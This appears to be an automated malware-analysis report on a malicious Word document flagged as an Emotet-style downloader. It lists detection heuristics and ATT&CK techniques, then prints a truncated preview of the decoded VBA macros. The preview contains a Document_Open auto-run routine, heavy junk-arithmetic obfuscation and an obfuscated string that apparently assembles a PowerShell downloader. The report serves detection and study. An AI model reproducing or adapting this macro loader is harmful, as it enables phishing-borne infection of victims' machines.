MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample is a Microsoft Office document containing VBA macros, including a Document_Open macro and a Shell() call, indicating malicious intent. The macros are heavily obfuscated but likely attempt to download and execute a second-stage payload from the embedded URL. The ClamAV detection further confirms its malicious nature.
Heuristics 5
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://FDV+FDV188 In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42062 bytes |
SHA-256: ca0d862bbf41b7ab66c8a4b774fb0c7d66cc3d0e11bf7536b128f1f011ef38f8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "hATQAab"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub JSCCEr(lOspit)
XHUpz = 61571 - CDbl(38986 / Int(56903) - 68566 / Round(87305 / CSng(7259 - CByte(46230)))) * FKiaMS * Fix(23483) - 13521 / CByte(jkBqFh) / IktKO - CBool(21225) / wTCSUf / Atn(67886)
End Sub
Sub wjBpb(ScQhzY)
knJamb = 52379 - CDbl(16320 / Int(20586) - 25136 / Round(52117 / CSng(89071 - CByte(60909)))) * HKzrbQ * Fix(45794) - 72750 / CByte(pPGWq) / ddOmE - CBool(28001) / tsiEIA / Atn(76535)
avvvL = 36065 - CDbl(31261 / Int(80117) - 46544 / Round(15576 / CSng(4777 - CByte(96583)))) * UKfEk * Fix(776) - 64739 / CByte(MHaVbQ) / IWIXw - CBool(3769) / ULbfp / Atn(24592)
qiCQNZ = 64761 - CDbl(6028 / Int(99236) - 44634 / Round(311 / CSng(11803 - CByte(69709)))) * nUZjB * Fix(16513) - 63002 / CByte(zfAPF) / TdFLUu - CBool(41926) / YFNrZF / Atn(44939)
End Sub
Sub XrRAhr(vnEHp)
XQwTrj = 42380 - CDbl(34086 / Int(79020) - 71649 / Round(79496 / CSng(85446 - CByte(20159)))) * UWJiad * Fix(28542) - 15647 / CByte(wFIcb) / XQnjw - CBool(2971) / PYiWBT / Atn(65395)
cHWvh = 47783 - CDbl(56933 / Int(41564) - 62499 / Round(22030 / CSng(30468 - CByte(28717)))) * zOjGu * Fix(14923) - 33725 / CByte(BLMui) / lAEcv - CBool(50252) / Vzmhu / Atn(71386)
End Sub
Private Sub Document_open()
On Error Resume Next
vGVimh = 29437 - CDbl(20060 / Int(97598) - 30175 / Round(14018 / CSng(22207 - CByte(31676)))) * avKACR * Fix(84988) - 40531 / CByte(iUoGdQ) / ZzWXZu - CBool(82540) / HzsaBo / Atn(40863)
Application.Run JPvBbj + "nDwtwTQk" + TBZfmO, bltBqH + MOmDZpBVVEhjQ + sMfEht
ZRTnN = 69831 - CDbl(59888 / Int(81924) - 66487 / Round(28804 / CSng(41970 - CByte(86638)))) * CVzPE * Fix(29067) - 19006 / CByte(GhAwN) / QDPwun - CBool(75344) / kGrYdS / Atn(70454)
End Sub
Sub ifzAm(NPASj)
SkSoAp = 27632 - CDbl(76059 / Int(35838) - 35291 / Round(52960 / CSng(11580 - CByte(38666)))) * lsYjl * Fix(83097) - 72345 / CByte(CUBMI) / qAwcDE - CBool(55014) / nDYoE / Atn(94394)
MErjil = 38847 - CDbl(83545 / Int(38058) - 63334 / Round(85029 / CSng(94422 - CByte(26947)))) * wnnjUz * Fix(34930) - 42090 / CByte(CPfkFU) / wmoUp - CBool(31791) / jiHVJ / Atn(55148)
LHOSpQ = 70579 - CDbl(16424 / Int(68561) - 99162 / Round(34556 / CSng(82006 - CByte(9270)))) * QwAPWL * Fix(70356) - 10213 / CByte(tshcH) / MbJtD - CBool(82727) / QSPEX / Atn(76560)
End Sub
Sub oCzLV(jGGmR)
GwUaH = 75847 - CDbl(56925 / Int(13984) - 44103 / Round(45918 / CSng(16994 - CByte(95064)))) * zIhiz * Fix(36300) - 77029 / CByte(CTrtWH) / UFUXct - CBool(71026) / wrIQt / Atn(62582)
End Sub
Sub RtBKXG(YHTdNE)
chlfmm = 33045 - CDbl(5621 / Int(72663) - 41020 / Round(14498 / CSng(24749 - CByte(98174)))) * rrCuQV * Fix(4820) - 97560 / CByte(LkkWhN) / zfjiT - CBool(19552) / kHuPO / Atn(14295)
DKHNhQ = 32632 - CDbl(67142 / Int(95602) - 65975 / Round(55185 / CSng(57548 - CByte(81001)))) * vBQjph * Fix(42839) - 54232 / CByte(URjURm) / GorLH - CBool(49162) / JAzmQh / Atn(97294)
End Sub
Attribute VB_Name = "pUwpGif"
Sub ZKbin(Avzwbb)
mfSVYH = 67573 - CDbl(84201 / Int(90517) - 11800 / Round(89569 / CSng(64184 - CByte(36861)))) * MYcfsb * Fix(29746) - 34262 / CByte(jupNA) / nTFWN - CBool(5877) / dThWwh / Atn(58499)
End Sub
Function MOmDZpBVVEhjQ()
On Error Resume Next
ZaNiGn = 91931 - CDbl(21292 / Int(3774) - 68188 / Round(13430 / CSng(62379 - CByte(73537)))) * wlFfDF * Fix(6893) - 87919 / CByte(bTCZd) / nRzond - CBool(77139) / tEvtPX / Atn(74177)
OjwqEzQJjX = ouYdW("fFDV+FD'+'VIkaFD'+'V+FDV+IkawFDV+FDV-objFDV+FDVecIka+IkatIka) random;nF'+'DV+FDVgTFDV+FDVYYU FDV+FDV= .(FDV+FDVIkane'+'FDV+FDVI,5vzRnO", dNZWE - dNZWE + 2 + dNZWE - dNZWE, dNZWE - dNZWE + 126 + dNZWE - dNZWE)
YmWwCb = 96463 - CDbl(81565 / Int(25640) - 80000 / Round(61986 / CSng(31253 - CByte(74157)))) * DNROO * Fix(34043) - 18455 / CByte(wJHGLa) / MnWXj - CBool(91392) / DftMT / Atn(13417)
wXECd = 80038 - CDbl(6786 / Int(47702) - 9633 /
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.